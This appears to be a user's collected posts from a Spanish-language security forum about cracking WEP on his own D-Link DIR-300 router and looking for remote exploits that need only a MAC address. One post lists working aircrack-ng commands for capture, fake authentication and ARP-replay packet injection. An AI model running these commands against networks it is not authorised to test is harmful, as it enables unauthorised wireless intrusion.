Mensajes

y algun ejemplo de exploit que pueda ser explotado teniendo como dato la MAC?, si es para mi router mejor dir-300.

Gracias

y cuales serian los ataques mas efectivos en WEP?

y puede ser por ejemplo que una placa de red reconozca la red, pero capture pocos paquetes y si este transmitiendo?, o si detecta la red y tiene una señal relativamente buena  deberia detectarlos.

y los ataques activos en que consistirian entonces?, ahora estoy un poco confundido, porque tenia entendido que la idea era generar paquetes con autenticaciones falses y realizando inyecciones.

pero de esa manera genero el trafico yo desde la red, mi idea es no hacerlo.

Buenas,

Estoy buscando la forma de generar muchos paquetes a mi pequeño router dir 300 y poder vulnerar mi clave.

Hasta el momento lo puede hacer pero si yo mismo genero trafico de alguna PC de mi red.
Pero si no hay actividad no pude encontrarle la vuelta para hacerlo, quiza este haciendo algo mal.

Detallo los pasos que estoy siguiendo.

1 - La placa en modo monitor.

2 -  Inicio la captura de paquetes en un archivo en el canal 9 que esta mi RED y la MAC

Código [Seleccionar] Expandir

airodump-ng -w output --channel 9 --bssid MAC mon0

3 - En otra terminal ejecuto el siguiente comando para generar falsas autenticaciones.

Código [Seleccionar] Expandir

aireplay-ng -1 0 -a (bssid of target) (interface)

4 - En otra terminal realizo inyeccion de paquetes.

Código [Seleccionar] Expandir

aireplay-ng -3 -b MAC mon0

Lo que me esta pasando es que el trafico generado es muy poco, o sea, para llegar a los 20.000 paquetes el ataque de esta manera tardaria varios dias.

Código [Seleccionar] Expandir

CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
                                                                                                             
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
MAC                    42 100     5240          59  338   9  54  WEP  WEP         mired                           
                                                                                                           
BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                           
MAC                     MAC1             42     0   183782 

Existe alguna manera de generar trafico mas rapidamente?

Gracias

gracias por la respuesta.

Estoy haciendo unas pruebas con mi router, es un DLINK DIR-300. Todos las vulnerabilidades que encuentro para ser explotadas, el target tiene que ser si o si una IP de intranet.

Hay algunos para ser explotados usando una MAC?, me interesa saber si puede ser explotado por fuera de mi red.

Gracias

Buenas,

Con la  mac address de un AP y sabiendo de que marca es y el modelo, es posible lanzar un exploit remoto?, o es necesario estar dentro de la intranet?

Gracias

Buenas, existe algun soft en el cual me permite analizar la potencia de la señal de mi antena?, si tengo por ej una placa wifi con una antena, y luego le cambio de antena por una de mayor dbi, como puedo ver la ganancia en ambas?

Gracias.

Buenas, me gustaria saber maso menos de donde viene una señan de un AP en particular, hay algunas aplicaciones ya sea para android o para linux que me permite ir siguiendo la intensidad de la señal para detectar la ubicacion de emision?

Gracias.